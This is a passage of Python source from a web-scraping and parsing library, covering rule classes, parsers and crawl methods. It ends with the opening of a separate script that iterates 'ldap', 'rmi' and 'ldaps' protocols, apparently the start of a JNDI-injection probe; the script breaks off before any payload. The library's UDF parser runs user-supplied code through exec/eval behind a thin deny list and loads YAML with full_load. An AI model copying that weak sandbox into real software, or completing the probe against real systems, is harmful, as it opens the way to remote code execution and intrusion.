index = int(arg)
else:
index = 1
return matched.group(index)
except IndexError:
return ""
class JSONPathParser(BaseParser):
"""JSONPath parser, requires `jsonpath-rw-ext` library.
Since json input object may be dict / list, _RECURSION_LIST will be False.
:param input_object: input object, could be str, list, dict.
:type input_object: [str, list, dict]
:param param: JSON path
:type param: [str]
:param value: attribute of find result, default to '' as '$value'
:type value: [str, None]
:return: list of str
:rtype: List[Union[str]]
examples:
[{'a': {'b': {'c': 1}}}, '$..c', ''] => [1]
"""
name = 'jsonpath'
doc_url = 'https://github.com/sileht/python-jsonpath-rw-ext'
test_url = 'https://jsonpath.com/'
installed = check_import('jsonpath_rw_ext')
_RECURSION_LIST = False
def _parse(self, input_object, param, value=''):
if isinstance(input_object, str):
input_object = GlobalConfig.json_loads(input_object)
value = value or '$value'
attr_name = value[1:]
if param.startswith('JSON.'):
param = '$%s' % param[4:]
# try get the compiled jsonpath
jsonpath_expr = getattr(param, 'code', _lib.jp_parse(param))
result = [
getattr(match, attr_name, match.value)
for match in jsonpath_expr.find(input_object)
]
return result
class ObjectPathParser(BaseParser):
"""ObjectPath parser, requires `objectpath` library.
Since json input object may be dict / list, _RECURSION_LIST will be False.
:param input_object: input object, could be str, list, dict.
:type input_object: [str, list, dict]
:param param: ObjectPath
:type param: [str]
:param value: not to use
:type value: [Any]
examples:
[{'a': {'b': {'c': 1}}}, '$..c', ''] => [1]
"""
name = 'objectpath'
doc_url = 'http://github.com/adriank/ObjectPath'
test_url = 'http://objectpath.org/'
installed = check_import('objectpath')
_RECURSION_LIST = False
ITER_TYPES_TUPLE = tuple(_lib.ITER_TYPES)
def _parse(self, input_object, param, value=''):
if isinstance(input_object, str):
input_object = GlobalConfig.json_loads(input_object)
if param.startswith('JSON.'):
param = '$%s' % param[4:]
tree = _lib.OP_Tree(input_object)
result = tree.execute(param)
# from objectpath.core import ITER_TYPES
if isinstance(result, self.ITER_TYPES_TUPLE):
result = list(result)
return result
class JMESPathParser(BaseParser):
"""JMESPath parser, requires `jmespath` library.
Since json input object may be dict / list, _RECURSION_LIST will be False.
:param input_object: input object, could be str, list, dict.
:type input_object: [str, list, dict]
:param param: JMESPath
:type param: [str]
:param value: not to use
:type value: [Any]
examples:
[{'a': {'b': {'c': 1}}}, 'a.b.c', ''] => 1
"""
name = 'jmespath'
doc_url = 'https://github.com/jmespath/jmespath.py'
test_url = 'http://jmespath.org/'
installed = check_import('jmespath')
_RECURSION_LIST = False
def _parse(self, input_object, param, value=''):
if isinstance(input_object, str):
input_object = GlobalConfig.json_loads(input_object)
code = getattr(param, 'code', _lib.jmespath_compile(param))
return code.search(input_object)
class UDFParser(BaseParser):
"""UDFParser. Python source code snippets. globals will contain `input_object` and `context` variables.
Since python input object may be any type, _RECURSION_LIST will be False.
param & value:
param: the python source code to be exec(param), either have the function named `parse`, or will return eval(param)
value: will be renamed to `context`, which can be used in parser function. `value` often be set as the dict of request & response.
examples:
['a b c d', 'input_object[::-1]', ''] => 'd c b a'
['a b c d', 'context["key"]', {'key': 'value'}] => 'value'
['a b c d', 'md5(input_object)', ''] => '713f592bd537f7725d491a03e837d64a'
['["string"]', 'json_loads(input_object)', ''] => ['string']
['["string"]', 'json_loads(obj)', ''] => ['string']
[['string'], 'json_dumps(input_object)', ''] => '["string"]'
['a b c d', 'parse = lambda input_object: input_object', ''] => 'a b c d'
['a b c d', 'def parse(input_object): context["key"]="new";return context', {'key': 'old'}] => {'key': 'new'}
"""
name = 'udf'
doc_url = 'https://docs.python.org/3/'
# able to import other libs
_ALLOW_IMPORT = True
# strict protection
_FORBIDDEN_FUNCS = {
"input": NotImplemented,
"open": NotImplemented,
"eval": NotImplemented,
"exec": NotImplemented,
}
# Differ from others, treate list as list object
_RECURSION_LIST = False
# for udf globals, here could save some module can be used, such as: _GLOBALS_ARGS = {'requests': requests}
_GLOBALS_ARGS = {
'md5': md5,
'json_loads': GlobalConfig.json_loads,
'json_dumps': GlobalConfig.json_dumps,
're': re,
'encode_as_base64': encode_as_base64,
'decode_as_base64': decode_as_base64,
}
@property
def doc(self):
return f'{self.__class__.__doc__}\n\n_GLOBALS_ARGS: {list(self._GLOBALS_ARGS.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
@staticmethod
def get_code_mode(code):
if isinstance(code, CompiledString):
return code.operator
if 'parse' in code and ('lambda' in code or 'def ' in code):
return exec
else:
return eval
def _parse(self, input_object, param, value=""):
# context could be any type, if string, will try to json.loads
# if value is null, will use the context dict from CrawlerRule & ParseRule
if value and isinstance(value, str):
try:
context = GlobalConfig.json_loads(value)
except GlobalConfig.JSONDecodeError:
context = {}
else:
context = value or {}
if not self._ALLOW_IMPORT and 'import' in param:
raise RuntimeError(
'UDFParser._ALLOW_IMPORT is False, so source code should not has `import` strictly. If you really want it, set `UDFParser._ALLOW_IMPORT = True` manually'
)
# obj is an alias for input_object
local_vars = {
'input_object': input_object,
'context': context,
'obj': input_object,
}
local_vars.update(self._FORBIDDEN_FUNCS)
local_vars.update(self._GLOBALS_ARGS)
context_locals = context.get('locals')
if context_locals:
local_vars.update(context_locals)
# run code
code = getattr(param, 'code', param)
if self.get_code_mode(param) is exec:
exec(code, local_vars, local_vars)
parse_function = local_vars.get('parse')
if not parse_function:
raise ValueError(
'UDF snippet should have a function named `parse`')
return parse_function(input_object)
else:
return eval(code, local_vars, local_vars)
class PythonParser(BaseParser):
r"""PythonParser. Some frequently-used utils.
Since python input object may be any type, _RECURSION_LIST will be False.
:param input_object: input object, any object.
:type input_object: [object]
param & value:
1. param: getitem, alias to get
value: could be [0] as index, [1:3] as slice, ['key'] for dict
2. param: split
value: return input_object.split(value or None)
3. param: join
value: return value.join(input_object)
4. param: chain
value: nonsense `value` variable. return list(itertools.chain(*input_object))
5. param: const
value: return value if value else input_object.
6. param: template
value: Template.safe_substitute(input_object=input_object, **input_object if isinstance(input_object, dict))
7. param: index
value: value can be number string / key.
8. param: sort
value: value can be asc (default) / desc.
9. param: strip
value: chars. return str(input_object).strip(value)
10. param: base64_encode, base64_decode
from string to string.
11. param: a number for index, will try to get input_object.__getitem__(int(param))
value: default string
similar to `param=default` if param is 0
If not param, return value. (like `const`)
examples:
[[1, 2, 3], 'getitem', '[-1]'] => 3
[[1, 2, 3], 'getitem', '[:2]'] => [1, 2]
['abc', 'getitem', '[::-1]'] => 'cba'
[{'a': '1'}, 'getitem', 'a'] => '1'
[{'a': '1'}, 'get', 'a'] => '1'
['a b\tc \n \td', 'split', ''] => ['a', 'b', 'c', 'd']
[['a', 'b', 'c', 'd'], 'join', ''] => 'abcd'
[['aaa', ['b'], ['c', 'd']], 'chain', ''] => ['a', 'a', 'a', 'b', 'c', 'd']
['python', 'template', '1 $input_object 2'] => '1 python 2'
[[1], 'index', '0'] => 1
['python', 'index', '-1'] => 'n'
[{'a': '1'}, 'index', 'a'] => '1'
['adcb', 'sort', ''] => ['a', 'b', 'c', 'd']
[[1, 3, 2, 4], 'sort', 'desc'] => [4, 3, 2, 1]
['aabbcc', 'strip', 'a'] => 'bbcc'
['aabbcc', 'strip', 'ac'] => 'bb'
[' \t a ', 'strip', ''] => 'a'
['a', 'default', 'b'] => 'a'
['', 'default', 'b'] => 'b'
[' ', 'default', 'b'] => 'b'
['a', 'base64_encode', ''] => 'YQ=='
['YQ==', 'base64_decode', ''] => 'a'
['a', '0', 'b'] => 'a'
['', '0', 'b'] => 'b'
[None, '0', 'b'] => 'b'
[{0: 'a'}, '0', 'a'] => 'a'
[{0: 'a'}, '', 'abc'] => 'abc'
"""
name = 'python'
doc_url = 'https://docs.python.org/3/'
# Differ from others, treate list as list object
_RECURSION_LIST = False
def __init__(self):
self.param_functions = {
'getitem': self._handle_getitem,
'get': self._handle_getitem,
'split': lambda input_object, param, value: input_object.split(
value or None),
'join': lambda input_object, param, value: value.join(input_object),
'chain': lambda input_object, param, value: list(
chain(*input_object)),
'const': lambda input_object, param, value: value or input_object,
'template': self._handle_template,
'index': lambda input_object, param, value: input_object[int(
value) if (value.isdigit() or value.startswith('-') and value[
1:].isdigit()) else value],
'sort': lambda input_object, param, value: sorted(
input_object,
reverse=(True if value.lower() == 'desc' else False)),
'strip': self._handle_strip,
'default': self._handle_default,
'base64_encode': self._handle_base64_encode,
'base64_decode': self._handle_base64_decode,
}
@property
def doc(self):
return f'{self.__class__.__doc__}\n\nvalid param args: {list(self.param_functions.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
def _handle_index(self, input_object, param, value):
try:
return input_object[int(param)]
except (IndexError, ValueError, KeyError, TypeError):
return value
def _handle_others(self, input_object, param, value):
if param.isdigit():
return self._handle_index(input_object, param, value)
else:
return value or input_object
def _parse(self, input_object, param, value):
function = self.param_functions.get(param, self._handle_others)
return function(input_object, param, value)
def _handle_strip(self, input_object, param, value):
return str(input_object).strip(value or None)
def _handle_base64_encode(self, input_object, param, value):
return encode_as_base64(str(input_object))
def _handle_base64_decode(self, input_object, param, value):
return decode_as_base64(str(input_object))
def _handle_default(self, input_object, param, value):
if isinstance(input_object, str):
if input_object.strip():
return input_object
else:
return value
elif input_object:
return input_object
else:
return value
def _handle_template(self, input_object, param, value):
if isinstance(input_object, dict):
return Template(value).safe_substitute(input_object=input_object,
obj=input_object,
**input_object)
else:
return Template(value).safe_substitute(input_object=input_object,
obj=input_object)
def _handle_getitem(self, input_object, param, value):
if value and (value[0], value[-1]) == ('[', ']'):
value = value[1:-1]
if ':' in value:
# as slice
start, stop = value.split(':', 1)
if ':' in stop:
stop, step = stop.split(':')
else:
step = None
start = int(start) if start else None
stop = int(stop) if stop else None
step = int(step) if step else None
key = slice(start, stop, step)
else:
# as index
key = int(value)
return input_object[key]
else:
return input_object[value]
class LoaderParser(BaseParser):
"""LoaderParser. Loads string with json / yaml / toml standard format.
And also b16decode, b16encode, b32decode, b32encode, b64decode, b64encode, b85decode, b85encode.
Since input object should be string, _RECURSION_LIST will be True.
:param input_object: str match format of json / yaml / toml
:type input_object: [str]
:param param: loader name, such as: json, yaml, toml
:type param: [str]
:param value: some kwargs, input as json string
:type value: [str]
examples:
['{"a": "b"}', 'json', ''] => {'a': 'b'}
['a = "a"', 'toml', ''] => {'a': 'a'}
['animal: pets', 'yaml', ''] => {'animal': 'pets'}
['a', 'b64encode', ''] => 'YQ=='
['YQ==', 'b64decode', ''] => 'a'
"""
name = 'loader'
_RECURSION_LIST = True
def __init__(self):
self.loaders = {
'json': GlobalConfig.json_loads,
'toml': _lib.toml_loads,
'yaml': _lib.yaml_full_load,
'yaml_safe_load': _lib.yaml_safe_load,
'yaml_full_load': _lib.yaml_full_load,
'b16decode': lambda input_object: b16decode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b16encode': lambda input_object: b16encode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b32decode': lambda input_object: b32decode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b32encode': lambda input_object: b32encode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b64decode': lambda input_object: b64decode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b64encode': lambda input_object: b64encode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b85decode': lambda input_object: b85decode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
'b85encode': lambda input_object: b85encode(
input_object.encode(GlobalConfig.__encoding__)).decode(
GlobalConfig.__encoding__),
}
super().__init__()
@property
def doc(self):
return f'{self.__class__.__doc__}\n\nvalid param args: {list(self.loaders.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
def _parse(self, input_object, param, value=''):
loader = self.loaders.get(param, return_self)
if value:
try:
kwargs = GlobalConfig.json_loads(value)
return loader(input_object, **kwargs)
except GlobalConfig.JSONDecodeError as err:
return err
else:
return loader(input_object)
class TimeParser(BaseParser):
"""TimeParser. Parse different format of time. Sometimes time string need a preprocessing with regex.
Since input object can not be list, _RECURSION_LIST will be True.
To change time zone:
uniparser.time.LOCAL_TIME_ZONE = +8
:param input_object: str
:type input_object: [str]
:param param: encode / decode. encode: time string => timestamp; decode: timestamp => time string
:type param: [str]
:param value: standard strftime/strptime format
:type value: [str]
examples:
['2020-02-03 20:29:45', 'encode', ''] => 1580732985.0
['1580732985.1873155', 'decode', ''] => '2020-02-03 20:29:45'
['2020-02-03T20:29:45', 'encode', '%Y-%m-%dT%H:%M:%S'] => 1580732985.0
['1580732985.1873155', 'decode', '%b %d %Y %H:%M:%S'] => 'Feb 03 2020 20:29:45'
WARNING: time.struct_time do not have timezone info, so %z is always the local timezone
"""
name = 'time'
match_int_float = re_compile(r'^-?\d+(\.\d+)?$')
# EAST8 = +8, WEST8 = -8
_OS_LOCAL_TIME_ZONE: int = -int(timezone / 3600)
LOCAL_TIME_ZONE: int = _OS_LOCAL_TIME_ZONE
@property
def doc(self):
return f'{self.__class__.__doc__}\n\n_OS_LOCAL_TIME_ZONE: {self._OS_LOCAL_TIME_ZONE}\nLOCAL_TIME_ZONE: {self.LOCAL_TIME_ZONE}\n\n{self.doc_url}\n\n{self.test_url}'
def _parse(self, input_object, param, value):
value = value or "%Y-%m-%d %H:%M:%S"
tz_fix_hours = self.LOCAL_TIME_ZONE - self._OS_LOCAL_TIME_ZONE
tz_fix_seconds = tz_fix_hours * 3600
if param == 'encode':
# time string => timestamp
if '%z' in value:
msg = 'TimeParser Warning: time.struct_time do not have timezone info, so %z is nonsense'
logger.warning(msg)
return mktime(strptime(input_object, value)) - tz_fix_seconds
elif param == 'decode':
if isinstance(input_object,
str) and self.match_int_float.match(input_object):
input_object = float(input_object)
# timestamp => time string
return strftime(value, localtime(input_object + tz_fix_seconds))
else:
return input_object
class ContextParser(BaseParser):
"""Return a value from input_object with given key(param), input_object often be set with context dict.
:param input_object: will be ignore
:param param: the key in context
:type param: [str]
:param value: default value if context not contains the key(param)
:type value: [str]
"""
name = 'context'
@property
def doc(self):
return f'{self.__class__.__doc__}'
def _parse(self, input_object, param, value):
if not input_object or param not in input_object:
return value
return input_object[param]
class CompiledString(str):
__slots__ = ('operator', 'code')
__support__ = ('jmespath', 'jsonpath', 'udf')
def __new__(cls, string, mode=None, *args, **kwargs):
if isinstance(string, cls):
return string
obj = str.__new__(cls, string, *args, **kwargs)
obj = cls.compile(obj, string, mode)
return obj
@classmethod
def compile(cls, obj, string, mode=None):
if mode == 'jmespath':
if string.startswith('JSON.'):
string = string[5:]
obj.code = _lib.jmespath_compile(string)
elif mode == 'jsonpath':
obj.code = _lib.jp_parse(string)
elif mode == 'udf':
obj.operator = UDFParser.get_code_mode(string)
# for higher performance, pre-compile the code
obj.code = compile(string, string, obj.operator.__name__)
return obj
class JsonSerializable(dict):
__slots__ = ()
def __init__(self, **kwargs):
super().__init__()
self.update(kwargs)
def to_dict(self):
return dict(self)
def dumps(self, *args, **kwargs):
return GlobalConfig.json_dumps(self.to_dict(), *args, **kwargs)
def to_json(self, *args, **kwargs):
return self.dumps(*args, **kwargs)
@classmethod
def loads(cls, json_string):
if isinstance(json_string, cls):
return json_string
elif isinstance(json_string, str):
return cls(**GlobalConfig.json_loads(json_string))
elif isinstance(json_string, dict):
return cls(**json_string)
else:
raise TypeError('Only can be loaded from JSON / cls / dict.')
@classmethod
def from_json(cls, json_string):
return cls.loads(json_string)
class ParseRule(JsonSerializable):
"""ParseRule should contain this params:
1. a rule name, will be set as result key.
2. chain_rules: a list of [[parser_name, param, value], ...], will be parse one by one.
3. child_rules: a list of ParseRule instances, nested to save different values as named.
4. context: a dict shared values by udf parse of the rules, only when udf value is null. May be shared from upstream CrawlerRule.
Recursion parsing like a matryoshka doll.
"""
__slots__ = ('context',)
def __init__(self,
name: str,
chain_rules: List[List],
child_rules: List['ParseRule'] = None,
context: dict = None,
iter_parse_child: bool = False,
**kwargs):
chain_rules = self.compile_codes(chain_rules or [])
# ensure items of child_rules is ParseRule
child_rules = [
self.__class__(**parse_rule) for parse_rule in child_rules or []
]
self.context = GlobalConfig.init_context(
) if context is None else context
super().__init__(name=name,
chain_rules=chain_rules,
child_rules=child_rules,
**kwargs)
if iter_parse_child:
self['iter_parse_child'] = iter_parse_child
@staticmethod
def compile_rule(chain_rule):
if isinstance(chain_rule[1], CompiledString):
return chain_rule
if chain_rule[0] in CompiledString.__support__:
chain_rule[1] = CompiledString(chain_rule[1], mode=chain_rule[0])
return chain_rule
def compile_codes(self, chain_rules):
return [self.compile_rule(chain_rule) for chain_rule in chain_rules]
class CrawlerRule(JsonSerializable):
"""A standard CrawlerRule contains:
1. a rule name, will be set as result key.
2. request_args for sending request.
3. parse_rules: list of [ParseRule: , ...].
4. regex: regex which can match a given url.
5. context: a dict shared values by udf parse of the rules, only when udf value is null. May be shared to downstream ParseRule.
6 **kwargs: some extra kwargs, sometimes contains encoding param.
Rule format like:
{
"name": "crawler_rule",
"request_args": {
"method": "get",
"url": "http://example.com",
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
}
},
"parse_rules": [{
"name": "parse_rule",
"chain_rules": [["css", "p", "$text"], ["python", "getitem", "[0]"]],
"child_rules": [{
"name": "rule1",
"chain_rules": [["python", "getitem", "[:7]"]],
"child_rules": [
{
"name": "rule2",
"chain_rules": [["udf", "input_object[::-1]", ""]],
"child_rules": []
},
{
"name": "rule3",
"chain_rules": [["udf", "input_object[::-1]", ""]],
"child_rules": [{
"name": "rule4",
"chain_rules": [["udf", "input_object[::-1]", ""]],
"child_rules": []
}]
}
]
}]
}],
"regex": ""
}
Parse Result like:
{'crawler_rule': {'parse_rule': {'rule1': {'rule2': 'od sihT', 'rule3': {'rule4': 'This do'}}}}}
"""
__slots__ = ('context',)
CHECK_STRATEGY = 'match'
def __init__(self,
name: str,
request_args: Union[dict, str],
parse_rules: List[ParseRule] = None,
regex: str = None,
context: dict = None,
**kwargs):
_request_args: dict = ensure_request(request_args)
self.context = GlobalConfig.init_context(
) if context is None else context
parse_rules = [
ParseRule(context=self.context, **parse_rule)
for parse_rule in parse_rules or []
]
super().__init__(name=name,
parse_rules=parse_rules,
request_args=_request_args,
regex=regex or '',
**kwargs)
def get_request(self, **request):
if not request:
return self['request_args']
# deepcopy avoid headers pollution
for k, v in deepcopy(self['request_args']).items():
if k not in request:
request[k] = v
return request
def add_parse_rule(self, rule: ParseRule, context: dict = None):
rule = ParseRule(context=context or self.context, **rule)
self['parse_rules'].append(rule)
def pop_parse_rule(self, index, default=None):
try:
return self['parse_rules'].pop(index)
except IndexError:
return default
def clear_parse_rules(self):
self['parse_rules'].clear()
def search(self, url):
return not self['regex'] or re_compile(self['regex']).search(url)
def match(self, url):
return not self['regex'] or re_compile(self['regex']).match(url)
def check_regex(self, url, strategy=''):
return getattr(self, strategy or self.CHECK_STRATEGY)(url)
class HostRule(JsonSerializable):
__slots__ = ()
def __init__(self,
host: str,
crawler_rules: Dict[str, CrawlerRule] = None,
**kwargs):
crawler_rules = {
crawler_rule['name']: CrawlerRule(**crawler_rule)
for crawler_rule in (crawler_rules or {}).values()
}
super().__init__(host=host, crawler_rules=crawler_rules, **kwargs)
def findall(self, url, strategy=''):
# find all the rules which matched the given URL, strategy could be: match, search, findall
return [
rule for rule in self['crawler_rules'].values()
if rule.check_regex(url, strategy)
]
def find(self, url, strategy=''):
# find only one rule which matched the given URL, strategy could be: match, search, findall
rules = self.findall(url=url, strategy=strategy)
if len(rules) > 1:
raise ValueError(f'{url} matched more than 1 rule. {rules}')
if rules:
return rules[0]
def search(self, url):
return self.find(url, 'search')
def match(self, url):
return self.find(url, 'match')
def add_crawler_rule(self, rule: CrawlerRule):
if not isinstance(rule, CrawlerRule) and isinstance(rule, str):
rule = CrawlerRule.loads(rule)
self['crawler_rules'][rule['name']] = rule
try:
assert get_host(rule['request_args']['url']) == self[
'host'], f'different host: {self["host"]} not match {rule["request_args"]["url"]}'
assert self.match(rule['request_args']['url']) or self.search(
rule['request_args']['url']
), f'regex {rule["regex"]} not match the given url: {rule["request_args"]["url"]}'
except (ValueError, KeyError, AssertionError) as e:
self['crawler_rules'].pop(rule['name'], None)
raise e
def pop_crawler_rule(self, rule_name: str):
return self['crawler_rules'].pop(rule_name, None)
class Uniparser(object):
"""Parsers collection.
"""
_RECURSION_CRAWL = True
def __init__(self,
request_adapter: Union[AsyncRequestAdapter,
SyncRequestAdapter] = None,
parse_callback: Callable = None):
"""
:param request_adapter: request_adapter for downloading, defaults to None
:type request_adapter: Union[AsyncRequestAdapter, SyncRequestAdapter], optional
:param parse_callback: the callback function called while parsing result. Accept 3 args: (rule, result, context)
:type parse_callback: Callable, optional
"""
self._prepare_default_parsers()
self._prepare_custom_parsers()
self.request_adapter = request_adapter
self.parse_callback = parse_callback
self._DEFAULT_FREQUENCY = NullContext()
self._DEFAULT_ASYNC_FREQUENCY = NullContext()
self._HOST_FREQUENCIES: dict = {}
def _prepare_default_parsers(self):
self.css = CSSParser()
self.css1 = CSSSingleParser()
self.xml = XMLParser()
self.se = self.selectolax = SelectolaxParser()
self.se1 = self.selectolax1 = SelectolaxSingleParser()
self.jsonpath = JSONPathParser()
self.objectpath = ObjectPathParser()
self.json = self.jmespath = JMESPathParser()
self.loader = LoaderParser()
self.re = RegexParser()
self.py = self.python = PythonParser()
self.udf = UDFParser()
self.time = TimeParser()
self.context = ContextParser()
def _prepare_custom_parsers(self):
# handle the other sublclasses
for parser in BaseParser.__subclasses__():
if parser.name not in self.__dict__:
self.__dict__[parser.name] = parser()
@property
def parsers(self):
return [
parser for parser in self.__dict__.values()
if isinstance(parser, BaseParser)
]
@property
def parsers_all(self) -> Dict[str, BaseParser]:
return {
name: parser
for name, parser in self.__dict__.items()
if isinstance(parser, BaseParser)
}
@property
def parser_classes(self):
return BaseParser.__subclasses__()
def parse_chain(self,
input_object,
chain_rules: List,
context: dict = None):
context = GlobalConfig.init_context() if context is None else context
for parser_name, param, value in chain_rules:
parser: BaseParser = getattr(self, parser_name)
if parser is None:
msg = f'Unknown parser name: {parser_name}'
logger.error(msg)
raise UnknownParserNameError(msg)
if parser_name == 'context':
input_object = context
elif context and parser_name == 'udf' and not value:
value = context
input_object = parser.parse(input_object, param, value)
return input_object
def parse_crawler_rule(self, input_object, rule: CrawlerRule, context=None):
parse_rules = rule['parse_rules']
parse_result: Dict[str, Any] = {}
context = rule.context if context is None else context
context.setdefault('request_args', rule['request_args'])
# alias name for request_args in context
context.setdefault('req', context['request_args'])
context['parse_result'] = parse_result
_input_object = input_object
for parse_rule in parse_rules:
temp_result = self.parse_parse_rule(_input_object, parse_rule,
context).get(parse_rule['name'])
if parse_rule['name'] == GlobalConfig.__object__:
_input_object = temp_result
parse_result[parse_rule['name']] = temp_result
context.pop('parse_result', None)
return {rule['name']: parse_result}
def parse_parse_rule(self, input_object, rule: ParseRule, context=None):
# if context, use context; else use rule.context
context = rule.context if context is None else context
input_object = self.parse_chain(input_object,
rule['chain_rules'],
context=context)
if rule['name'] == GlobalConfig.__schema__ and input_object is not True:
raise InvalidSchemaError(
f'Schema check is not True: {repr(input_object)[:50]}')
if rule['child_rules']:
result: Dict[str, Any] = {rule['name']: {}}
if rule.get('iter_parse_child', False):
result[rule['name']] = []
for partial_input_object in input_object:
partial_result = {}
for sub_rule in rule['child_rules']:
partial_result[
sub_rule['name']] = self.parse_parse_rule(
partial_input_object, sub_rule,
context=context).get(sub_rule['name'])
result[rule['name']].append(partial_result)
else:
for sub_rule in rule['child_rules']:
result[rule['name']][
sub_rule['name']] = self.parse_parse_rule(
input_object, sub_rule,
context=context).get(sub_rule['name'])
else:
result = {rule['name']: input_object}
if self.parse_callback:
return self.parse_callback(rule, result, context)
return result
def parse(self,
input_object,
rule_object: Union[CrawlerRule, ParseRule],
context=None):
context = rule_object.context if context is None else context
if isinstance(rule_object, CrawlerRule):
input_object = InputCallbacks.callback(
text=input_object,
context=context,
callback_name=rule_object.get('input_callback'))
return self.parse_crawler_rule(input_object=input_object,
rule=rule_object,
context=context)
elif isinstance(rule_object, ParseRule):
return self.parse_parse_rule(input_object=input_object,
rule=rule_object,
context=context)
else:
raise TypeError(
'rule_object type should be CrawlerRule or ParseRule.')
async def aparse_crawler_rule(self,
input_object,
rule: CrawlerRule,
context=None):
parse_rules = rule['parse_rules']
parse_result: Dict[str, Any] = {}
context = rule.context if context is None else context
context.setdefault('request_args', rule['request_args'])
# alias name for request_args in context
context.setdefault('req', context['request_args'])
context['parse_result'] = parse_result
_input_object = input_object
for parse_rule in parse_rules:
temp_result = (await self.aparse_parse_rule(
_input_object, parse_rule, context)).get(parse_rule['name'])
if parse_rule['name'] == GlobalConfig.__object__:
_input_object = temp_result
parse_result[parse_rule['name']] = temp_result
context.pop('parse_result', None)
return {rule['name']: parse_result}
async def aparse_parse_rule(self,
input_object,
rule: ParseRule,
context=None):
# if context, use context; else use rule.context
context = rule.context if context is None else context
input_object = await to_thread(self.parse_chain, input_object,
rule['chain_rules'], context)
try:
input_object = await ensure_await_result(input_object)
except GlobalConfig.SYSTEM_ERRORS:
raise
except Exception as error:
input_object = error
if rule['name'] == GlobalConfig.__schema__ and input_object is not True:
raise InvalidSchemaError(
f'Schema check is not True: {repr(input_object)[:50]}')
if rule['child_rules']:
result: Dict[str, Any] = {rule['name']: {}}
if rule.get('iter_parse_child', False):
result[rule['name']] = []
for partial_input_object in input_object:
partial_result = {}
for sub_rule in rule['child_rules']:
temp_result = await self.aparse_parse_rule(
partial_input_object, sub_rule, context=context)
partial_result[sub_rule['name']] = temp_result.get(
sub_rule['name'])
result[rule['name']].append(partial_result)
else:
for sub_rule in rule['child_rules']:
temp_result = await self.aparse_parse_rule(input_object,
sub_rule,
context=context)
result[rule['name']][sub_rule['name']] = temp_result.get(
sub_rule['name'])
else:
result = {rule['name']: input_object}
if self.parse_callback:
if asyncio.iscoroutinefunction(self.parse_callback):
coro = self.parse_callback(rule, result, context)
else:
coro = asyncio.get_event_loop().run_in_executor(
None, self.parse_callback, rule, result, context)
return await coro
return result
async def aparse(self,
input_object,
rule_object: Union[CrawlerRule, ParseRule],
context=None):
context = rule_object.context if context is None else context
if isinstance(rule_object, CrawlerRule):
input_object = await InputCallbacks.acallback(
text=input_object,
context=context,
callback_name=rule_object.get('input_callback'))
return await self.aparse_crawler_rule(input_object=input_object,
rule=rule_object,
context=context)
elif isinstance(rule_object, ParseRule):
return await self.aparse_parse_rule(input_object=input_object,
rule=rule_object,
context=context)
else:
raise TypeError(
'rule_object type should be CrawlerRule or ParseRule.')
def ensure_adapter(self, sync=True):
if self.request_adapter:
request_adapter = self.request_adapter
if sync and isinstance(request_adapter, SyncRequestAdapter) or (
not sync) and isinstance(request_adapter,
AsyncRequestAdapter):
return self.request_adapter
if sync:
self.request_adapter = get_available_sync_request()()
else:
self.request_adapter = get_available_async_request()()
return self.request_adapter
def download(self,
crawler_rule: CrawlerRule = None,
request_adapter=None,
**request):
request_adapter = request_adapter or self.ensure_adapter(sync=True)
if not isinstance(request_adapter, SyncRequestAdapter):
raise RuntimeError('bad request_adapter type')
if isinstance(crawler_rule, CrawlerRule):
request_args = crawler_rule.get_request(**request)
else:
request_args = request
host = get_host(request_args['url'])
if request_args['url'].startswith('http'):
freq = self._HOST_FREQUENCIES.get(host, self._DEFAULT_FREQUENCY)
with freq:
with request_adapter as req:
input_object, resp = req.request(**request_args)
else:
# non-http request will skip the downloading process, request_args as input_object
input_object, resp = request_args, None
return input_object, resp
def crawl(self,
crawler_rule: CrawlerRule,
request_adapter=None,
context=None,
**request):
request_args = crawler_rule.get_request(**request)
input_object, resp = self.download(None, request_adapter,
**request_args)
if isinstance(resp, Exception):
return resp
if context is None:
context = crawler_rule.context
else:
for k, v in crawler_rule.context.items():
if k not in context:
context[k] = v
context['resp'] = resp
context['request_args'] = request_args
return self.parse(input_object, crawler_rule, context)
async def adownload(self,
crawler_rule: CrawlerRule = None,
request_adapter=None,
**request):
request_adapter = request_adapter or self.ensure_adapter(sync=False)
if not isinstance(request_adapter, AsyncRequestAdapter):
raise RuntimeError('bad request_adapter type')
if isinstance(crawler_rule, CrawlerRule):
request_args = crawler_rule.get_request(**request)
else:
request_args = request
host = get_host(request_args['url'])
if request_args['url'].startswith('http'):
freq = self._HOST_FREQUENCIES.get(host,
self._DEFAULT_ASYNC_FREQUENCY)
async with freq:
async with request_adapter as req:
input_object, resp = await req.request(**request_args)
else:
# non-http request will skip the downloading process, request_args as text
input_object, resp = request_args, None
return input_object, resp
async def acrawl(self,
crawler_rule: CrawlerRule,
request_adapter=None,
context=None,
**request):
request_args = crawler_rule.get_request(**request)
input_object, resp = await self.adownload(None, request_adapter,
**request_args)
if isinstance(resp, Exception):
return resp
if context is None:
context = crawler_rule.context
else:
for k, v in crawler_rule.context.items():
if k not in context:
context[k] = v
context['resp'] = resp
context['request_args'] = request_args
return await self.aparse(input_object, crawler_rule, context)
def set_frequency(self, host_or_url: str, n=0, interval=0):
host = get_host(host_or_url, host_or_url)
self._HOST_FREQUENCIES[host] = _lib.Frequency(n, interval)
def set_async_frequency(self, host_or_url: str, n=0, interval=0):
host = get_host(host_or_url, host_or_url)
self._HOST_FREQUENCIES[host] = _lib.AsyncFrequency(n, interval)
def pop_frequency(self, host_or_url: str, default=None):
host = get_host(host_or_url, host_or_url)
return self._HOST_FREQUENCIES.pop(host, default)
| ClericPy/uniparser | uniparser/parsers.py | parsers.py | py | 64,715 | python | en | code | 8 | github-code | 13 |
12377795623 | import requests
def make_requests(url):
protocols = ['ldap', 'rmi', 'ldaps']
for protocol in protocols:
headers = {
